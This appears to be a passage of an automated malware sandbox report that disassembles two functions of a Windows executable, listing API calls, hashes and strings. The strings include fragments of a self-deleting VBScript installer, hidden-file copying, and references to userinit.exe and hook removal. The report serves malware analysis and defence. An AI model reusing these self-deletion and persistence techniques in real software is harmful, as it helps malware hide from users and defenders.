                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$?c_str@?$basic_string@V?$basic_string@$Hstd@@$??0?$basic_string@G@2@@0@V10@0@$D@2@@0@$D@1@@File$DeleteG@1@@V10@V10@@$rand$??8std@@CreateModuleNameSleepV01@V01@@Y?$basic_string@srandtime
                                                • String ID: /stext "
                                                • API String ID: 1347597097-3856184850
                                                • Opcode ID: c964c884d86e60fa01018e4e044f271ff51472a76058e80f6c38b34f422d569f
                                                • Instruction ID: 67806982f23b8319e7b07c06254346e5951a872f1c84f04e5a93173d4b33b2ec
                                                • Opcode Fuzzy Hash: c964c884d86e60fa01018e4e044f271ff51472a76058e80f6c38b34f422d569f
                                                • Instruction Fuzzy Hash: 21E1CE7280011AABCF04FFA0DD59DDE777CAF14306F1041AAF506E30A1EA789B59CB69
                                                Function 004072E6 Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 334fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 4072e6-407303 wcslen 481 407305-407355 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ CreateDirectoryW ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 480->481 482 407357-407377 call 408137 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z 480->482 483 40737a-407399 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ wcscmp 481->483 482->483 485 4073d4-4073e8 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ CopyFileW 483->485 486 40739b-4073cf ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 407112 483->486 489 40749b-4074d1 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 407112 485->489 490 4073ee-4073f2 485->490 495 407707-40770b 486->495 498 4074d3-4074f2 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ SetFileAttributesW wcslen 489->498 499 407504-407562 _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 489->499 490->489 493 4073f8-407407 wcslen 490->493 496 407455-40746c call 408137 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z 493->496 497 407409-407453 call 408137 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 493->497 508 40746f-407489 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ CopyFileW 496->508 497->508 498->499 502 4074f4-407502 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ SetFileAttributesW 498->502 503 407605-4076c9 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z * 2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z * 2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 5 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 4118f7 499->503 504 407568-4075ff ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z * 2 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 6 499->504 502->499 511 4076f5-407701 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 503->511 512 4076cb-4076ec ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ShellExecuteW 503->512 504->503 508->489 510 40748b-407496 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 508->510 510->495 511->495 512->511 513 4076ee-4076ef exit 512->513 513->511
                                                APIs
                                                • wcslen.MSVCRT ref: 004072F5
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040730C
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407313
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419BA0,00413888,?), ref: 00407326
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407333
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407343
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040734C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407371
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040737A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407382
                                                • wcscmp.MSVCRT ref: 0040738F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 004073A0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004073D8
                                                • CopyFileW.KERNEL32(00419994,00000000), ref: 004073E0
                                                • wcslen.MSVCRT ref: 004073FB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00413888,?), ref: 00407420
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00413888,?), ref: 0040742D
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 00407438
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 00407441
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 0040744A
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407466
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00413888,?), ref: 0040746F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407479
                                                • CopyFileW.KERNEL32(00419994,00000000), ref: 00407481
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00419994), ref: 0040748E
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004074A0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 004074D7
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004074E4
                                                • wcslen.MSVCRT ref: 004074E9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 004074FB
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00407502
                                                • _wgetenv.MSVCRT ref: 00407512
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040751D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407528
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407533
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 00407545
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 00407553
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?,0041409C,0041417C), ref: 00407577
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,0041409C,00000000), ref: 0040758B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407596
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004075A3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004075B0
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004075BD
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004075C9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075D2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075DB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075E4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075ED
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075F6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004075FF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407612
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,00419958,00000000), ref: 0040762A
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407635
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407642
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040764F
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040765B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407664
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040766D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407676
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040767F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407688
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407696
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004076A2
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004076AC
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004076B8
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004076D6
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004076E3
                                                • exit.MSVCRT ref: 004076EF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004076F8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407701
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$|AA
                                                • API String ID: 740851534-1417474533
                                                • Opcode ID: 79a3ecc4cd0975fb733b225ccd06be5607290740e68429ae2c3a586f11c4d97f
                                                • Instruction ID: d1ab76961e62da3444ff14cf7ab97297d48a075a471a17b17a88d7526e7a0a1d
                                                • Opcode Fuzzy Hash: 79a3ecc4cd0975fb733b225ccd06be5607290740e68429ae2c3a586f11c4d97f
                                                • Instruction Fuzzy Hash: 8EC124B1900159AFCF05AFA0EC59DEF7B3CBB14306B048079F506E61A1EB789A49CB5D
                                                Function 0040770C Relevance: 122.8, APIs: 51, Strings: 19, Instructions: 287COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 692 40770c-407724 call 40a109 695 407730-407737 692->695 696 407726-40772b call 406079 692->696 698 407739 call 4100c6 695->698 699 40773e-407745 695->699 696->695 698->699 700 407747-407758 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 41178f 699->700 701 407759-40776a 699->701 700->701 704 407782-40778e 701->704 705 40776c-40777f ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 701->705 708 407790-4077a3 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 704->708 709 4077a6-4077b2 704->709 705->704 708->709 712 4077b4-4077d6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40aa65 709->712 713 4077d9-4077e0 709->713 712->713 714 4077e2-407804 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 40aa65 713->714 715 407807-40780e 713->715 714->715 719 407810-407827 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40ad45 715->719 720 40782a-407885 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 40a9ef 715->720 719->720 727 407887-407897 GetModuleFileNameW 720->727 728 407899-4078a3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ RegDeleteKeyA 720->728 729 4078a9-4078c5 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z 727->729 728->729 730 4078c7-4078d8 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ SetFileAttributesW 729->730 731 4078de-4078f2 SetFileAttributesW 729->731 730->731 732 4078f4 731->732 733 4078f7-40795d _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 731->733 732->733 734 4079bc-407a1d ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 733->734 735 40795f-4079b6 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 733->735 736 407a2d-407a35 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z 734->736 737 407a1f-407a27 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 734->737 735->734 738 407a77-407ab2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 4118f7 736->738 739 407a37-407a71 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 736->739 737->736 742 407ab4-407ac7 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ShellExecuteW 738->742 743 407acd-407ace exit 738->743 739->738 742->743
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 0040774C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407771
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407795
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00419BC8,6C9BAFB0,00000001), ref: 004077C4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00419BC8,6C9BAFB0,00000001), ref: 004077F2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407815
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 0040784A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407853
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000208,00000000), ref: 00407873
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045F8,00000000,00000000,004137F0,00407AF8,00000000,004137F0,6C9BB310), ref: 0040608E
                                                  • Part of subcall function 00406079: UnhookWindowsHookEx.USER32(00000000), ref: 00406097
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045D8,00000000), ref: 004060A7
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407891
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 004078BF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004078D1
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004078D8
                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004078EA
                                                • _wgetenv.MSVCRT ref: 00407905
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407910
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040791B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407926
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00407938
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00407948
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407953
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00407972
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00407982
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040798F
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040799B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079A4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079B6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00414294), ref: 004079D4
